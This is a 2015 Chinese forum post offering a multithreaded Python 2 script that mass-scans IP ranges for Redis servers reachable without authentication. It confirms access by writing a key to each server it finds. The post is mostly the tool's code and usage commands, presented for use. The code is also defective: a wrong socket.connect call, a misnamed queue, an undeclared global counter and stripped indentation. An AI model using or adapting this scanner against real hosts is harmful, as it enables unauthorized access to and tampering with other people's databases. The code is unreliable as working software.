本帖最后由 王珂 于 2015-11-16 18:31 编辑
实现功能:
redis未授权批量访问
首先会扫描端口开放的主机,然后测试是否存在未授权访问,提高速度
使用帮助:
从文本中读取内容
python redis.py -f finename
扫描C段
python redis.py -t 127.0.0.1/24 -p 6379
代码:
[Python] 纯文本查看 复制代码 #coding-utf-8
#author:i3esn0w
import redis
import ipaddr
import threading
import Queue
import sys
import socket
import time
import optparse
reload(sys)
sys.setdefaultencoding("utf8")
count=0
hosts=Queue.Queue()
targets=Queue.Queue()
def get_all_host(filename):
with open(filename,"r") as f :
for host in f.readlines():
host=host.strip()
hosts.put(host)
class host_alive(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue=queue
def run(self):
while True:
t=self.queue.get()
host=t.split(":")
port=host[1]
host=host[0]
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(host,int(port))
print "%s:%s port open!"%(host,port)
target.put((host,port))
except Exception, e:
pass
finally:s.close()
time.sleep(0.00000001)
self.queue.task_done()
class exploit_redis(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue=queue
def run(self):
while True:
host,port=self.queue.get()
host=host.__str__()
try:
p=redis.Redis(host=host,port=port)
p.set("hello","redis")
print "%s:%s Unauthorized"%(host,port)
count+=1
except Exception, e:
pass
def main():
option=optparse.OptionParser()
option.add_option('-f',dest='filename',default='')
option.add_option('-t',dest='host',default='')
option.add_option('-p',dest='port',default='6379')
(options, args) = option.parse_args()
if not options.filename=="":
get_all_host(options.filename)
if not options.host=="":
tars = ipaddr.IPv4Network(options.host)
for target in tars:
hosts.put(("%s:%s")%(target,options.port))
if options.filename=="" and options.host=="":
exit(0)
for i in range(20):
t=host_alive(hosts)
t.setDaemon(True)
t.start()
for i in range(20):
t=exploit_redis(targets)
t.setDaemon(True)
t.start()
print "Find %s targets"%count
if __name__ == '__main__':
main()
| 
发表于 2015-11-16 18:13:53
